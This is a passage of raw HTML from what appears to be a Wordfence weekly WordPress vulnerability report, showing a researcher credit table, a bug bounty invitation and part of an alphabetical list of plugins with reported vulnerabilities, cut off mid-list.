					<img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0762f07d2d241bc80d9a4817b0625b83.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0762f07d2d241bc80d9a4817b0625b83"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener">zhuxuan wu</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/340785ad53a1d99fd1554ac3f88bf112.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="340785ad53a1d99fd1554ac3f88bf112"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener">she11f</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d8e6822edce0e2861e1ce160f4975e34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8e6822edce0e2861e1ce160f4975e34"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener">Win3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener">Yousof Nahya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener">Hamza Nour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/221461b70f6b0e2c571141647c2528f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="221461b70f6b0e2c571141647c2528f4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener">Yousof Nahya (whoami03)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/78db0fddf357f7207a5574afee653e7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="78db0fddf357f7207a5574afee653e7d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener">Septio Noerdiansyah</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2440c0aacc02af8dcc176fda663ee4a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2440c0aacc02af8dcc176fda663ee4a8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener">Nguyen Quang Truong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bbe3fab00912827f35b45e537ae8af7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bbe3fab00912827f35b45e537ae8af7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener">Hardik Patel</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9c1637c1901bf472307fb82f9ffe38a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c1637c1901bf472307fb82f9ffe38a3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener">Daniel Púa &#8211; devploit</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Ad Invalid Click Protector (AICP)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-invalid-click-protector" target="_blank" rel="noopener">ad-invalid-click-protector</a>
		</td>
</tr>
<tr>
<td>Admin and Site Enhancements (ASE) Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements-pro" target="_blank" rel="noopener">admin-site-enhancements-pro</a>
		</td>
</tr>
<tr>
<td>Advanced Form Integration — Connect Forms to 200+ Apps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-form-integration" target="_blank" rel="noopener">advanced-form-integration</a>
		</td>
</tr>
<tr>
<td>Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick …</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder" target="_blank" rel="noopener">advanced-responsive-video-embedder</a>
		</td>
</tr>
<tr>
<td>Advanced Shipment Tracking for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-advanced-shipment-tracking" target="_blank" rel="noopener">woo-advanced-shipment-tracking</a>
		</td>
</tr>
<tr>
<td>Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">acf-views</a>
		</td>
</tr>
<tr>
<td>Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-woo-labels" target="_blank" rel="noopener">advanced-woo-labels</a>
		</td>
</tr>
<tr>
<td>AffiliateWP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">affiliate-wp</a>
		</td>
</tr>
<tr>
<td>AI Copilot – Content Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">ai-copilot-content-generator</a>
		</td>
</tr>
<tr>
<td>AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">ai-engine</a>
		</td>
</tr>
<tr>
<td>Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">animation-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>AnsPress – Question and answer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/anspress-question-answer" target="_blank" rel="noopener">anspress-question-answer</a>
		</td>
</tr>
<tr>
<td>Anti Spam and list cleaner – AcyChecker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acychecker" target="_blank" rel="noopener">acychecker</a>
		</td>
</tr>
<tr>
<td>Auto Featured Image (Auto Post Thumbnail)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail" target="_blank" rel="noopener">auto-post-thumbnail</a>
		</td>
</tr>
<tr>
<td>BackWPup – WordPress Backup &amp; Restore Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">backwpup</a>
		</td>
</tr>
<tr>
<td>Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">bp-better-messages</a>
		</td>
</tr>
<tr>
<td>Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-form" target="_blank" rel="noopener">bit-form</a>
		</td>
</tr>
<tr>
<td>Bit integrations – Form Integration, Webhook, Spreadsheets, CRM, LMS &amp; Email Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-integrations" target="_blank" rel="noopener">bit-integrations</a>
		</td>
</tr>
<tr>
<td>Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">booking</a>
		</td>
</tr>
<tr>
<td>Booking System Trafft</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system-trafft" target="_blank" rel="noopener">booking-system-trafft</a>
		</td>
</tr>
<tr>
<td>BOX NOW Delivery Croatia + Slovenia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/box-now-delivery-croatia" target="_blank" rel="noopener">box-now-delivery-croatia</a>
		</td>
</tr>
<tr>
<td>Breakdance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">breakdance</a>
		</td>
</tr>
<tr>
<td>BuddyPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">buddypress</a>
		</td>
</tr>
<tr>
<td>Business Directory Plugin – Easy Listing Directories for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/business-directory-plugin" target="_blank" rel="noopener">business-directory-plugin</a>
		</td>
</tr>
<tr>
<td>Chaty Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty-pro" target="_blank" rel="noopener">chaty-pro</a>
		</td>
</tr>
<tr>
<td>Checkout Field Editor for WooCommerce – Checkout Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-field-editor-and-manager-for-woocommerce" target="_blank" rel="noopener">checkout-field-editor-and-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Colissimo shipping methods for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/colissimo-shipping-methods-for-woocommerce" target="_blank" rel="noopener">colissimo-shipping-methods-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Contact Form to Any API</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-any-api" target="_blank" rel="noopener">contact-form-to-any-api</a>
		</td>
</tr>
<tr>
<td>Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">contest-gallery</a>
		</td>
</tr>
<tr>
<td>Cost Calculator Builder PRO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder-pro" target="_blank" rel="noopener">cost-calculator-builder-pro</a>
		</td>
</tr>
<tr>
<td>Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">cozy-addons</a>
		</td>
</tr>
<tr>
<td>Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/creative-mail-by-constant-contact" target="_blank" rel="noopener">creative-mail-by-constant-contact</a>
		</td>
</tr>
<tr>
<td>CubeWP Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">cubewp-framework</a>
		</td>
</tr>
<tr>
<td>Database Collation Fix</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-collation-fix" target="_blank" rel="noopener">database-collation-fix</a>
		</td>
</tr>
<tr>
<td>Database for CF7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-for-cf7" target="_blank" rel="noopener">database-for-cf7</a>
		</td>
</tr>
<tr>
<td>Demi – One Click Demo Import, Backup &amp; Site Migration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">demi-backup-migration</a>
		</td>
</tr>
<tr>
<td>Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">dokan-lite</a>
		</td>
</tr>
<tr>
<td>Download Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">download-manager</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">easy-digital-downloads</a>
		</td>
</tr>
<tr>
<td>Easy PayPal &amp; Stripe Buy Now Button</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ecommerce-paypal" target="_blank" rel="noopener">wp-ecommerce-paypal</a>
		</td>
</tr>
<tr>
<td>Easy Property Listings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-property-listings" target="_blank" rel="noopener">easy-property-listings</a>
		</td>
</tr>
<tr>
<td>Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugins-on-steroids" target="_blank" rel="noopener">plugins-on-steroids</a>
		</td>
</tr>
<tr>
<td>Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">bdthemes-element-pack-lite</a>
		</td>
</tr>
<tr>
<td>Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">essential-addons-for-elementor-lite</a>
		</td>
</tr>
<tr>
<td>Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">mage-eventpress</a>
		</td>
</tr>
<tr>
<td>Exclusive Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">exclusive-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>Export User Data</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-user-data" target="_blank" rel="noopener">export-user-data</a>
		</td>
</tr>
<tr>
<td>Extra Checkout Options &#8211; addon for Extra Product Options plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-tm-extra-checkout-options-addon" target="_blank" rel="noopener">woocommerce-tm-extra-checkout-options-addon</a>
		</td>
</tr>
<tr>
<td>Facturación Electrónica Costa Rica</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/factura-electronica-cr" target="_blank" rel="noopener">factura-electronica-cr</a>
		</td>
</tr>
<tr>
<td>FleekDash V2</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fleekdash" target="_blank" rel="noopener">fleekdash</a>
		</td>
</tr>
<tr>
<td>Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">fluentform</a>
		</td>
</tr>
<tr>
<td>FormCraft</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft" target="_blank" rel="noopener">formcraft</a>
		</td>
</tr>
<tr>
<td>FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formgent" target="_blank" rel="noopener">formgent</a>
		</td>
</tr>
<tr>
<td>Formidable Forms Signature Online Contract Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-signature-formidable-online-contract-automation" target="_blank" rel="noopener">forms-signature-formidable-online-contract-automation</a>
		</td>
</tr>
<tr>
<td>FundEngine – Donation and Crowdfunding Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">wp-fundraising-donation</a>
		</td>
</tr>
<tr>
<td>FuseWP – WordPress User Sync to Email List &amp; Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusewp" target="_blank" rel="noopener">fusewp</a>
		</td>
</tr>
<tr>
<td>Gallery PhotoBlocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photoblocks-grid-gallery" target="_blank" rel="noopener">photoblocks-grid-gallery</a>
		</td>
</tr>
<tr>
<td>GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">gamipress</a>
		</td>
</tr>
<tr>
<td>GenerateBlocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generateblocks" target="_blank" rel="noopener">generateblocks</a>
		</td>
</tr>
<tr>
<td>GEO Plugin by Squirrly SEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">squirrly-seo</a>
		</td>
</tr>
<tr>
<td>GetGenie – AI SEO Assistant &amp; Content Writer with Keyword Research, AEO &amp; GEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getgenie" target="_blank" rel="noopener">getgenie</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>GSheetConnector – Contact Form 7 Google Sheets Connector &amp; Save CF7 Entries to Database</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-google-sheets-connector" target="_blank" rel="noopener">cf7-google-sheets-connector</a>
		</td>
</tr>
<tr>
<td>GTM4WP – A Google Tag Manager (GTM) plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duracelltomi-google-tag-manager" target="_blank" rel="noopener">duracelltomi-google-tag-manager</a>
		</td>
</tr>
<tr>
<td>Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutena-forms" target="_blank" rel="noopener">gutena-forms</a>
		</td>
</tr>
<tr>
<td>HBook &#8211; Hotel booking system &#8211; WordPress Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hbook-2" target="_blank" rel="noopener">hbook</a>
		</td>
</tr>
<tr>
<td>Icegram Engage – Popups, Optins, CTAs &amp; Lead Generation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram" target="_blank" rel="noopener">icegram</a>
		</td>
</tr>
<tr>
<td>Icegram Mailer – Reliable Email Deliverability, No-code SMTP Replacement &amp; Email logs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram-mailer" target="_blank" rel="noopener">icegram-mailer</a>
		</td>
</tr>
<tr>
<td>Improved Save Button</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/improved-save-button" target="_blank" rel="noopener">improved-save-button</a>
		</td>
</tr>
<tr>
<td>Insert Headers and Footers Code – HT Script</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-headers-and-footers-script" target="_blank" rel="noopener">insert-headers-and-footers-script</a>
		</td>
</tr>
<tr>
<td>Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">jeg-elementor-kit</a>
		</td>
</tr>
<tr>
<td>JetBlocks for Elementor</td>
<td>
